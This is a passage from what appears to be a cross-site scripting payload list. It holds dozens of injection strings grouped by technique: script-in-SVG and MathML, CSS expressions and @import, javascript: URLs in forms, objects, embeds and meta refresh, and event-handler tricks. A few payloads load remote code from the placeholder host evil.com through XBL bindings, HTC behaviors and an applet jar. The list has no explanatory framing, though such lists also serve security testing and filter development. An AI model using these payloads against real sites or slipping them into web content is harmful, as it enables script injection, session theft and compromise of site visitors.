<script>var div=document.createElement('div');div.innerHTML='<script>alert(1)</script>';document.body.appendChild(div.cloneNode(true))</script>
# execCommand (deprecated but works in some contexts)
<script>document.execCommand('insertHTML',false,'<img src=x onerror=alert(\'XSS\')>')</script>
# Design mode
<script>document.designMode='on';document.write('<script>alert(1)</script>')</script>
# ContentEditable
<div contenteditable="true" onblur="this.innerHTML='<img src=x onerror=alert(1)>'">Edit me</div>
<div contenteditable="true" oninput="this.innerHTML='<script>alert(\'XSS\')</script>'">Type here</div>
# SVG with script execution
<svg><script>alert(1)</script></svg>
<svg><script>document.write('<img src=x onerror=alert(\'XSS\')>')</script></svg>
# MathML with script execution
<math><script>alert(1)</script></math>
<math><maction actiontype="statusline#http://evil.com" xlink:href="javascript:alert('XSS')">Click</maction></math>
# XBL binding (Firefox)
<div style="-moz-binding:url('http://evil.com/xbl.xml#xss')">XSS</div>
<div style="-moz-binding:url(data:text/xml,%3Cbindings%20xmlns%3D%22http%3A%2F%2Fwww.mozilla.org%2Fxbl%22%3E%3Cbinding%20id%3D%22xss%22%3E%3Cimplementation%3E%3Cconstructor%3Ealert(1)%3C%2Fconstructor%3E%3C%2Fimplementation%3E%3C%2Fbinding%3E%3C%2Fbindings%3E)">Test</div>
# HTC behavior (IE)
<div style="behavior:url(http://evil.com/xss.htc)">XSS</div>
# CSS @import with JavaScript
<style>@import "javascript:alert(1)";</style>
<style>@import url("javascript:alert(\'XSS\')");</style>
# CSS expression with DOM
<style>body{background:url("javascript:alert(1)")}</style>
<div style="background:expression(eval('alert(\'XSS\')'))">Test</div>
# Link with href manipulation
<a href="#" onclick="this.href='javascript:alert(1)'">Click</a>
<a href="javascript:void(0)" onmouseover="this.href='javascript:alert(\'XSS\')'">Hover</a>
# Map with area manipulation
<map name="xss"><area shape="rect" coords="0,0,100,100" href="javascript:alert(1)"></map>
<img usemap="#xss">
# Object with data manipulation
<object data="javascript:alert(1)"></object>
<object data="about:blank" onerror="this.data='javascript:alert(\'XSS\')'"></object>
# Embed with src manipulation
<embed src="javascript:alert(1)">
<embed src="about:blank" onerror="this.src='javascript:alert(\'XSS\')'">
# Applet with archive
<applet archive="http://evil.com/xss.jar" code="xss.class"></applet>
<applet code="javascript:alert(1)"></applet>
# Meta with content manipulation
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta http-equiv="Link" content="<javascript:alert('XSS')>; rel=stylesheet">
# Form with method and action
<form method="post" action="javascript:alert(1)"><input type="submit"></form>
<form action="javascript:alert(\'XSS\')"><button>Submit</button></form>
# Button with formaction
<button form="test" formaction="javascript:alert(1)">Click</button>
<form id="test"></form>
<button formaction="javascript:alert(\'XSS\')">Submit</button>
# Input with type image
<input type="image" src="javascript:alert(1)">
<input type="image" formaction="javascript:alert(\'XSS\')">
# IsIndex with action
<isindex action="javascript:alert(1)" type="submit">
<isindex action="javascript:alert(\'XSS\')">